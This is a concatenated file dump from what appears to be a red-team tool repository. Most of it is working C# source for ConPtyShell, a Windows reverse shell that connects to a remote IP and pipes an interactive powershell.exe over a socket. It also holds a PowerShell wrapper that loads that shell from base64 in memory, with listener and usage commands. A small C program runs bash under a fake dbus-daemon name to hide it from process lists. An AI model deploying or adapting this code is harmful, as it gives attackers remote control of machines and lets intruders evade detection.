GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, IntPtr.Zero, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, IntPtr.Zero); 284 | IntPtr hStdin = CreateFile("CONIN$", GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, IntPtr.Zero, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, IntPtr.Zero); 285 | SetStdHandle(STD_OUTPUT_HANDLE, hStdout); 286 | SetStdHandle(STD_ERROR_HANDLE, hStdout); 287 | SetStdHandle(STD_INPUT_HANDLE, hStdin); 288 | } 289 | 290 | private static void EnableVirtualTerminalSequenceProcessing() 291 | { 292 | uint outConsoleMode = 0; 293 | IntPtr hStdOut = GetStdHandle(STD_OUTPUT_HANDLE); 294 | if (!GetConsoleMode(hStdOut, out outConsoleMode)) 295 | { 296 | throw new 
InvalidOperationException("Could not get console mode"); 297 | } 298 | outConsoleMode |= ENABLE_VIRTUAL_TERMINAL_PROCESSING | DISABLE_NEWLINE_AUTO_RETURN; 299 | if (!SetConsoleMode(hStdOut, outConsoleMode)) 300 | { 301 | throw new InvalidOperationException("Could not enable virtual terminal processing"); 302 | } 303 | } 304 | 305 | private static int CreatePseudoConsoleWithPipes(ref IntPtr handlePseudoConsole, ref IntPtr ConPtyInputPipeRead, ref IntPtr ConPtyOutputPipeWrite, uint rows, uint cols){ 306 | int result = -1; 307 | EnableVirtualTerminalSequenceProcessing(); 308 | result = CreatePseudoConsole(new COORD { X = (short)cols, Y = (short)rows }, ConPtyInputPipeRead, ConPtyOutputPipeWrite, 0, out handlePseudoConsole); 309 | return result; 310 | } 311 | 312 | private static STARTUPINFOEX ConfigureProcessThread(IntPtr handlePseudoConsole, IntPtr attributes) 313 | { 314 | IntPtr lpSize = IntPtr.Zero; 315 | bool success = InitializeProcThreadAttributeList(IntPtr.Zero, 1, 0, ref lpSize); 316 | if (success || lpSize == IntPtr.Zero) 317 | { 318 | throw new InvalidOperationException("Could not calculate the number of bytes for the attribute list. " + Marshal.GetLastWin32Error()); 319 | } 320 | STARTUPINFOEX startupInfo = new STARTUPINFOEX(); 321 | startupInfo.StartupInfo.cb = Marshal.SizeOf(); 322 | startupInfo.lpAttributeList = Marshal.AllocHGlobal(lpSize); 323 | success = InitializeProcThreadAttributeList(startupInfo.lpAttributeList, 1, 0, ref lpSize); 324 | if (!success) 325 | { 326 | throw new InvalidOperationException("Could not set up attribute list. " + Marshal.GetLastWin32Error()); 327 | } 328 | success = UpdateProcThreadAttribute(startupInfo.lpAttributeList, 0, attributes, handlePseudoConsole, (IntPtr)IntPtr.Size, IntPtr.Zero,IntPtr.Zero); 329 | if (!success) 330 | { 331 | throw new InvalidOperationException("Could not set pseudoconsole thread attribute. 
" + Marshal.GetLastWin32Error()); 332 | } 333 | return startupInfo; 334 | } 335 | 336 | /* Spawns commandLine with CreateProcess, passing EXTENDED_STARTUPINFO_PRESENT so the attribute list carried in sInfoEx (prepared by ConfigureProcessThread) is honoured. Both SECURITY_ATTRIBUTES structs are left at defaults apart from nLength. Throws InvalidOperationException carrying the Win32 error code when CreateProcess fails. NOTE(review): Marshal.SizeOf() appears to have lost its type argument during extraction. */ private static PROCESS_INFORMATION RunProcess(ref STARTUPINFOEX sInfoEx, string commandLine) 337 | { 338 | PROCESS_INFORMATION pInfo = new PROCESS_INFORMATION(); 339 | int securityAttributeSize = Marshal.SizeOf(); 340 | SECURITY_ATTRIBUTES pSec = new SECURITY_ATTRIBUTES { nLength = securityAttributeSize }; 341 | SECURITY_ATTRIBUTES tSec = new SECURITY_ATTRIBUTES { nLength = securityAttributeSize }; 342 | bool success = CreateProcess(null, commandLine, ref pSec, ref tSec, false, EXTENDED_STARTUPINFO_PRESENT, IntPtr.Zero, null, ref sInfoEx, out pInfo); 343 | if (!success) 344 | { 345 | throw new InvalidOperationException("Could not create process. " + Marshal.GetLastWin32Error()); 346 | } 347 | return pInfo; 348 | } 349 | 350 | /* Builds the STARTUPINFOEX that attaches handlePseudoConsole as PROC_THREAD_ATTRIBUTE_PSEUDOCONSOLE and spawns commandLine under it. Returns the PROCESS_INFORMATION (process and thread handles) that the caller is responsible for closing. */ private static PROCESS_INFORMATION CreateChildProcessWithPseudoConsole(IntPtr handlePseudoConsole, string commandLine){ 351 | STARTUPINFOEX startupInfo = ConfigureProcessThread(handlePseudoConsole, (IntPtr)PROC_THREAD_ATTRIBUTE_PSEUDOCONSOLE); 352 | PROCESS_INFORMATION processInfo = RunProcess(ref startupInfo, commandLine); 353 | return processInfo; 354 | } 355 | 356 | /* Thread body: relays child output to the network. threadParams is an object[] of [OutputPipeRead (IntPtr), shellSocket (Socket)]. Reads the pipe in 16 KiB chunks with ReadFile and forwards exactly dwBytesRead bytes with Send, until ReadFile fails (pipe closed) or Send returns 0. Failures are not reported to anyone; the loop simply ends. */ private static void ThreadReadPipeWriteSocket(object threadParams) 357 | { 358 | object[] threadParameters = (object[]) threadParams; 359 | IntPtr OutputPipeRead = (IntPtr)threadParameters[0]; 360 | Socket shellSocket = (Socket)threadParameters[1]; 361 | uint bufferSize=16*1024; 362 | byte[] bytesToWrite = new byte[bufferSize]; 363 | bool readSuccess = false; 364 | Int32 bytesSent = 0; 365 | uint dwBytesRead=0; 366 | /* ReadFile blocks until the child writes or the pipe is closed. */ do{ 367 | readSuccess = ReadFile(OutputPipeRead, bytesToWrite, bufferSize, out dwBytesRead, IntPtr.Zero); 368 | bytesSent = shellSocket.Send(bytesToWrite, (Int32)dwBytesRead, 0); 369 | } while (bytesSent > 0 && readSuccess); 370 | } 371 | 372 | /* Packs the pipe handle and socket into an object[] and starts ThreadReadPipeWriteSocket on a new Thread. Returns the Thread so the caller can Abort() it during cleanup. */ private static Thread StartThreadReadPipeWriteSocket(IntPtr OutputPipeRead, Socket shellSocket){ 373 | object[] threadParameters = new 
object[2]; 374 | threadParameters[0]=OutputPipeRead; 375 | threadParameters[1]=shellSocket; 376 | Thread thThreadReadPipeWriteSocket = new Thread(ThreadReadPipeWriteSocket); 377 | thThreadReadPipeWriteSocket.Start(threadParameters); 378 | return thThreadReadPipeWriteSocket; 379 | } 380 | 381 | /* Thread body: relays network input to the child. threadParams is an object[] of [InputPipeWrite (IntPtr), shellSocket (Socket), hChildProcess (IntPtr)]. Receives up to 16 KiB per call and writes it to the pipe with WriteFile. When Receive returns 0 (remote side closed) or WriteFile fails, the loop ends and the child is killed with TerminateProcess, so a disconnect from the remote end tears down the spawned process. */ private static void ThreadReadSocketWritePipe(object threadParams) 382 | { 383 | object[] threadParameters = (object[]) threadParams; 384 | IntPtr InputPipeWrite = (IntPtr)threadParameters[0]; 385 | Socket shellSocket = (Socket)threadParameters[1]; 386 | IntPtr hChildProcess = (IntPtr)threadParameters[2]; 387 | uint bufferSize=16*1024; 388 | byte[] bytesReceived = new byte[bufferSize]; 389 | bool writeSuccess = false; 390 | Int32 nBytesReceived = 0; 391 | uint bytesWritten = 0; 392 | do{ 393 | nBytesReceived = shellSocket.Receive(bytesReceived, (Int32)bufferSize, 0); 394 | writeSuccess = WriteFile(InputPipeWrite, bytesReceived, (uint)nBytesReceived, out bytesWritten, IntPtr.Zero); 395 | } while (nBytesReceived > 0 && writeSuccess); 396 | /* Unconditional: reached on both clean disconnect and write failure. */ TerminateProcess(hChildProcess, 0); 397 | } 398 | 399 | /* Packs the pipe handle, socket and child process handle into an object[] and starts ThreadReadSocketWritePipe on a new Thread. Returns the Thread so the caller can Abort() it during cleanup. */ private static Thread StartThreadReadSocketWritePipe(IntPtr InputPipeWrite, Socket shellSocket, IntPtr hChildProcess){ 400 | object[] threadParameters = new object[3]; 401 | threadParameters[0]=InputPipeWrite; 402 | threadParameters[1]=shellSocket; 403 | threadParameters[2]=hChildProcess; 404 | Thread thReadSocketWritePipe = new Thread(ThreadReadSocketWritePipe); 405 | thReadSocketWritePipe.Start(threadParameters); 406 | return thReadSocketWritePipe; 407 | } 408 | 409 | /* Main routine, called from ConPtyShellMainClass.ConPtyShellMain. Opens a TCP connection to remoteIp:remotePort (ConnectSocket), lets the peer override rows/cols (TryParseRowsColsFromSocket), creates two anonymous pipes and spawns commandLine with its standard handles bound to them: under a pseudo console when kernel32!CreatePseudoConsole can be resolved, otherwise with STARTF_USESTDHANDLES via CreateProcessW. Two relay threads move data between the pipes and the socket until the child exits (WaitForSingleObject), after which the threads are aborted and every handle is closed. Returns a status string; failure strings are prefixed with errorString. From a defender's viewpoint note that the calling (.NET host) process owns the outbound socket while the child only inherits pipe handles or a pseudo console. */ public static string SpawnConPtyShell(string remoteIp, int remotePort, uint rows, uint cols, string commandLine){ 410 | string output = ""; 411 | Socket shellSocket = ConnectSocket(remoteIp, remotePort); 412 | if(shellSocket == null){ 413 | output += string.Format("{0}Could not connect to ip {1} on port {2}", errorString, remoteIp, remotePort.ToString()); 414 | return output; 415 | } 416 | 
TryParseRowsColsFromSocket(shellSocket, ref rows, ref cols); 417 | IntPtr InputPipeRead = new IntPtr(0); 418 | IntPtr InputPipeWrite = new IntPtr(0); 419 | IntPtr OutputPipeRead = new IntPtr(0); 420 | IntPtr OutputPipeWrite = new IntPtr(0); 421 | IntPtr handlePseudoConsole = new IntPtr(0); 422 | PROCESS_INFORMATION childProcessInfo = new PROCESS_INFORMATION(); 423 | CreatePipes(ref InputPipeRead, ref InputPipeWrite, ref OutputPipeRead, ref OutputPipeWrite); 424 | InitConsole(); 425 | /* Feature probe: resolve CreatePseudoConsole at runtime rather than importing it, so the code still runs on Windows builds that lack ConPTY. */ if(GetProcAddress(GetModuleHandle("kernel32"), "CreatePseudoConsole") == IntPtr.Zero){ 426 | Console.WriteLine("\r\nCreatePseudoConsole function not found! Spawning a netcat-like interactive shell...\r\n"); 427 | /* Fallback: the child's stdin/stdout/stderr are the raw pipe ends (stdout and stderr share one pipe), so it gets no console at all. */ STARTUPINFO sInfo = new STARTUPINFO(); 428 | sInfo.cb = Marshal.SizeOf(sInfo); 429 | sInfo.dwFlags |= (Int32)STARTF_USESTDHANDLES; 430 | sInfo.hStdInput = InputPipeRead; 431 | sInfo.hStdOutput = OutputPipeWrite; 432 | sInfo.hStdError = OutputPipeWrite; 433 | CreateProcessW(null, commandLine, IntPtr.Zero, IntPtr.Zero, true, 0, IntPtr.Zero, null, ref sInfo, out childProcessInfo); 434 | } 435 | else{ 436 | Console.WriteLine("\r\nCreatePseudoConsole function found! Spawning a fully interactive shell...\r\n"); 437 | /* ConPTY path: the pseudo console takes ownership of the pipe ends passed by ref and is sized rows x cols. A non-zero result is reported as an HRESULT-style error code in the returned string. */ int pseudoConsoleCreationResult = CreatePseudoConsoleWithPipes(ref handlePseudoConsole, ref InputPipeRead, ref OutputPipeWrite, rows, cols); 438 | if(pseudoConsoleCreationResult != 0) 439 | { 440 | output += string.Format("{0}Could not create psuedo console. Error Code {1}", errorString, pseudoConsoleCreationResult.ToString()); 441 | return output; 442 | } 443 | childProcessInfo = CreateChildProcessWithPseudoConsole(handlePseudoConsole, commandLine); 444 | } 445 | // Note: We can close the handles to the PTY-end of the pipes here 446 | // because the handles are dup'ed into the ConHost and will be released 447 | // when the ConPTY is destroyed. 
448 | if (InputPipeRead != IntPtr.Zero) CloseHandle(InputPipeRead); 449 | if (OutputPipeWrite != IntPtr.Zero) CloseHandle(OutputPipeWrite); 450 | //Threads have better performance than Tasks 451 | Thread thThreadReadPipeWriteSocket = StartThreadReadPipeWriteSocket(OutputPipeRead, shellSocket); 452 | Thread thReadSocketWritePipe = StartThreadReadSocketWritePipe(InputPipeWrite, shellSocket, childProcessInfo.hProcess); 453 | /* Blocks the calling thread for the whole lifetime of the child; the relay threads do all the work meanwhile. */ WaitForSingleObject(childProcessInfo.hProcess, INFINITE); 454 | //cleanup everything 455 | thThreadReadPipeWriteSocket.Abort(); 456 | thReadSocketWritePipe.Abort(); 457 | shellSocket.Shutdown(SocketShutdown.Both); 458 | shellSocket.Close(); 459 | CloseHandle(childProcessInfo.hThread); 460 | CloseHandle(childProcessInfo.hProcess); 461 | if (handlePseudoConsole != IntPtr.Zero) ClosePseudoConsole(handlePseudoConsole); 462 | if (InputPipeWrite != IntPtr.Zero) CloseHandle(InputPipeWrite); 463 | if (OutputPipeRead != IntPtr.Zero) CloseHandle(OutputPipeRead); 464 | output += "ConPtyShell kindly exited.\r\n"; 465 | return output; 466 | } 467 | } 468 | 469 | /* Command-line front end: validates the positional arguments [remoteIp, remotePort, rows?, cols?, commandLine?] and hands them to ConPtyShell.SpawnConPtyShell. Every validation failure calls Environment.Exit(0) instead of returning, which terminates the whole host process that loaded this assembly. */ public static class ConPtyShellMainClass{ 470 | /* Help text is empty in this build, so DisplayHelp prints nothing. */ private static string help = ""; 471 | 472 | /* True for -h, --help or /? (exact, case-sensitive match). */ private static bool HelpRequired(string param) 473 | { 474 | return param == "-h" || param == "--help" || param == "/?"; 475 | } 476 | 477 | /* Exits the process (exit code 0) when fewer than two positional arguments are given. */ private static void CheckArgs(string[] arguments) 478 | { 479 | if(arguments.Length < 2){ 480 | Console.Out.Write("\r\nConPtyShell: Not enough arguments. 2 Arguments required. 
Use --help for additional help.\r\n"); 481 | System.Environment.Exit(0); 482 | } 483 | 484 | } 485 | 486 | /* Writes the (empty) help string to stdout. */ private static void DisplayHelp() 487 | { 488 | Console.Out.Write(help); 489 | } 490 | 491 | /* Validates ipString with IPAddress.TryParse (accepts IPv4 and IPv6 literals; host names are rejected). Exits with code 0 on failure, otherwise returns the original string unchanged. */ private static string CheckRemoteIpArg(string ipString){ 492 | IPAddress address; 493 | if (!IPAddress.TryParse(ipString, out address)) 494 | { 495 | Console.Out.Write("\r\nConPtyShell: Invalid remoteIp value {0}\r\n", ipString); 496 | System.Environment.Exit(0); 497 | } 498 | return ipString; 499 | } 500 | 501 | /* Parses arg with Int32.TryParse (current culture, no range check: the port is not restricted to 1-65535 and negative values are later cast to uint by ParseRows/ParseCols). Exits with code 0 on failure. */ private static int CheckInt(string arg){ 502 | int ret = 0; 503 | if (!Int32.TryParse(arg, out ret)) 504 | { 505 | Console.Out.Write("\r\nConPtyShell: Invalid integer value {0}\r\n", arg); 506 | System.Environment.Exit(0); 507 | } 508 | return ret; 509 | } 510 | 511 | /* Optional third argument; defaults to 24 rows. */ private static uint ParseRows(string[] arguments){ 512 | uint rows = 24; 513 | if (arguments.Length > 2) 514 | rows = (uint)CheckInt(arguments[2]); 515 | return rows; 516 | } 517 | 518 | /* Optional fourth argument; defaults to 80 columns. */ private static uint ParseCols(string[] arguments){ 519 | uint cols = 80; 520 | if (arguments.Length > 3) 521 | cols = (uint)CheckInt(arguments[3]); 522 | return cols; 523 | } 524 | 525 | /* Optional fifth argument; defaults to "powershell.exe". The value is passed verbatim as the CreateProcess command line. */ private static string ParseCommandLine(string[] arguments){ 526 | string commandLine = "powershell.exe"; 527 | if (arguments.Length > 4) 528 | commandLine = arguments[4]; 529 | return commandLine; 530 | } 531 | 532 | /* Entry point invoked by the PowerShell wrapper. A single -h/--help//? argument prints the help text; otherwise the arguments are validated and SpawnConPtyShell's status string is returned. Because the validators call Environment.Exit, a bad argument never produces a return value. */ public static string ConPtyShellMain(string[] args){ 533 | string output=""; 534 | if (args.Length == 1 && HelpRequired(args[0])) 535 | { 536 | DisplayHelp(); 537 | } 538 | else 539 | { 540 | CheckArgs(args); 541 | string remoteIp = CheckRemoteIpArg(args[0]); 542 | int remotePort = CheckInt(args[1]); 543 | uint rows = ParseRows(args); 544 | uint cols = ParseCols(args); 545 | string commandLine = ParseCommandLine(args); 546 | output=ConPtyShell.SpawnConPtyShell(remoteIp, remotePort, rows, cols, commandLine); 547 | } 548 | return output; 549 | } 550 | } 551 | "@; 
-------------------------------------------------------------------------------- /shells/Invoke-ConPtyShell2.ps1: -------------------------------------------------------------------------------- 1 | #Requires -Version 2 2 | 3 | function Invoke-ConPtyShell2 4 | { 5 | <# 6 | .SYNOPSIS 7 | ConPtyShell - Fully Interactive Reverse Shell for Windows 8 | Author: splinter_code 9 | License: MIT 10 | Source: https://github.com/antonioCoco/ConPtyShell 11 | 12 | .DESCRIPTION 13 | ConPtyShell - Fully interactive reverse shell for Windows 14 | 15 | Properly set the rows and cols values. You can retrieve them from 16 | your terminal with the command "stty size". 17 | 18 | You can avoid setting the rows and cols values if you run your listener 19 | with the following command: 20 | stty raw -echo; (stty size; cat) | nc -lvnp 3001 21 | 22 | If you want to change the console size directly from powershell 23 | you can paste the following commands: 24 | $width=80 25 | $height=24 26 | $Host.UI.RawUI.BufferSize = New-Object Management.Automation.Host.Size ($width, $height) 27 | $Host.UI.RawUI.WindowSize = New-Object -TypeName System.Management.Automation.Host.Size -ArgumentList ($width, $height) 28 | 29 | 30 | .PARAMETER RemoteIp 31 | The remote IP address to connect to 32 | .PARAMETER RemotePort 33 | The remote port to connect to 34 | .PARAMETER Rows 35 | Rows size for the console 36 | Default: "24" 37 | .PARAMETER Cols 38 | Cols size for the console 39 | Default: "80" 40 | .PARAMETER CommandLine 41 | The command line of the process you are going to interact with 42 | Default: "powershell.exe" 43 | 44 | .EXAMPLE 45 | PS>Invoke-ConPtyShell2 10.0.0.2 3001 46 | 47 | Description 48 | ----------- 49 | Spawn a reverse shell 50 | 51 | .EXAMPLE 52 | PS>Invoke-ConPtyShell2 -RemoteIp 10.0.0.2 -RemotePort 3001 -Rows 30 -Cols 90 53 | 54 | Description 55 | ----------- 56 | Spawn a reverse shell with specific rows and cols size 57 | 58 | .EXAMPLE 59 | PS>Invoke-ConPtyShell2 -RemoteIp 10.0.0.2 -RemotePort 3001 -Rows 30 
-Cols 90 -CommandLine cmd.exe 60 | 61 | Description 62 | ----------- 63 | Spawn a reverse shell (cmd.exe) with specific rows and cols size 64 | 65 | #> 66 | Param 67 | ( 68 | [Parameter(Position = 0, Mandatory = $True)] 69 | [String] 70 | $RemoteIp, 71 | 72 | [Parameter(Position = 1, Mandatory = $True)] 73 | [String] 74 | $RemotePort, 75 | 76 | [Parameter()] 77 | [String] 78 | $Rows = "24", 79 | 80 | [Parameter()] 81 | [String] 82 | $Cols = "80", 83 | 84 | [Parameter()] 85 | [String] 86 | $CommandLine = "powershell.exe" 87 | ) 88 | <# All parameters stay strings; the .NET side (ConPtyShellMainClass) parses and validates them. The embedded assembly is base64-decoded and loaded reflectively from the byte array, so no file is written to disk, and its ConPtyShellMain entry point is called with the argument array. Note that argument-validation failures inside the assembly call Environment.Exit, which ends this PowerShell host process rather than returning an error. #> $parametersConPtyShell = @($RemoteIp, $RemotePort, $Rows, $Cols, $CommandLine) 89 | $ConPtyShellBase64 = "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" 90 | $ConPtyShellBytes = [System.Convert]::FromBase64String($ConPtyShellBase64) 91 | [Reflection.Assembly]::Load($ConPtyShellBytes) | Out-Null 92 | $output = [ConPtyShellMainClass]::ConPtyShellMain($parametersConPtyShell) 93 | Write-Output $output 94 | } 95 | -------------------------------------------------------------------------------- /situational-awareness/procmon.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash
# Polls "ps -eo command" once per second and prints a diff against the previous
# snapshot, so processes that started or exited since the last poll show up as
# +/- lines. Runs until interrupted; output goes to stdout.
2 | 3 | IFS=$'\n' 4 | 5 | old_process=$(ps -eo command) 6 | 7 | while true; do 8 | new_process=$(ps -eo command) 9 | diff <(echo "$old_process") <(echo "$new_process") 10 | sleep 1 11 | old_process=$new_process 12 | done 13 | -------------------------------------------------------------------------------- /stealth/fake-argv/Makefile: -------------------------------------------------------------------------------- 1 | fake : fake.o 2 | cc -o fake fake.o 3 | 4 | fake.o : 5 | cc -o fake.o -c bash-fake-argv.c 6 | 7 | clean : 8 | rm -f fake fake.o 9 | -------------------------------------------------------------------------------- /stealth/fake-argv/bash-fake-argv.c: -------------------------------------------------------------------------------- 1 | /* #include needed to use pid_t, etc. 
*/ 2 | /* #include needed to use wait() */ 3 | #include 4 | #include 5 | #include 6 | #include /* LINUX constants and functions (fork(), etc.) */ 7 | /* NOTE(review): the header names of the four #include lines above appear to have been stripped during extraction (angle-bracketed names are missing). */ 8 | /* Replaces the current process image with /bin/bash via execlp while supplying a misleading argv[0] that mimics a dbus-daemon command line; tools that display the command line from argv (ps, top) then show the fake name. For detection, compare that argv-derived name against the real executable path in /proc/<pid>/exe and the kernel's comm field, which execlp does not disguise. */ int main(int argc, char* argv[]) { 9 | execlp("/bin/bash", "/usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only", "--norc", "--noprofile", "-i", NULL); 10 | /* Only reached if execlp fails; 127 is the conventional "command not found" status. */ exit(127); 11 | } 12 | -------------------------------------------------------------------------------- /stealth/fake-argv/fake: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/d0nkeys/redteam/d8ad2009a354d466e11fda6074dd4610f82089ee/stealth/fake-argv/fake --------------------------------------------------------------------------------